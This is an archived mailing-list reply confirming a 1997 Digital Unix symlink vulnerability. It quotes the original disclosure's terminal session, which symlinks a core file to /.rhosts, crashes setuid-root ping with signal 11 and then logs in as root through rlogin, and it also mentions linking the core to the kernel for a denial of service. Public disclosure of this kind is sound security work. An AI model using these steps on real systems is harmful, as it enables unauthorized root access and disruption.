Re: Symlink problem (Tested only on a Digital Unix 4.0)

[jonz () NETRAIL NET (Jonathan A. Zdziarski)]

BSDi 3.1 -> Didn't Work
Solaris 2.6 (Intel) -> Didn't work

Just to confirm:
DEC Unix 4.0d:
21158 Memory fault - core dumped
$ ls -la core
21159 Memory fault - core dumped
lrwxrwxrwx   1 jonz     staff          8 Apr  6 15:18 core -> /.rhosts
$ ls -la /.rhosts
-rw-------   1 root     system    458752 Apr  6 15:18 /.rhosts
$

Thank you,

Jonathan A. Zdziarski
Systems Administrator
Netrail Incorporated
888-NETRAIL
jonz () netrail net

On Sun, 6 Apr 1997, root wrote:

:Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN]
:(28/03/1998)
:
:Starting 2 suid root programs in background, and killing them with -11 flag,
:we'll have a core root owned with our gid and mode 600. Then is enough a
:symlink
:to create a file everywhere...like /.rhosts.
:
:rusty () mad it soren () atlink it
:
:$ ls -l /.rhosts
:/.rhosts not found
:$ ls -l /usr/sbin/ping
:-rwsr-xr-x   1 root     bin        32768 Nov 16  1996 /usr/sbin/ping
:$ ln -s /.rhosts core
:$ IMP='
:>+ +
:>'
:$ ping somehost &
:[1] 1337
:$ ping somehost &
:[2] 31337
:$ kill -11 31337
:$ kill -11 1337
:[1]    Segmentation fault   /usr/sbin/ping somehost (core dumped)
:[2]    +Segmentation fault   /usr/sbin/ping somehost (core dumped)
:$ ls -l /.rhosts
:-rw-------   1 root     system    385024 Mar 29 05:17 /.rhosts
: ##/.rhosts has been created....that's all.##
:$ rlogin localhost -l root
:
:Is a very serious problem, it needs a fix as soon as possible,
:infact we can have a DoS if we link our core to the kernel.
:
:
:Other platforms:
:
:SunOs    4.1.x 5.5.x    Doesn't work
:Linux       2.0.x             Doesn't work
:Digital Unix 4.0d         Doesn't work
:Others     (note tested yet)
: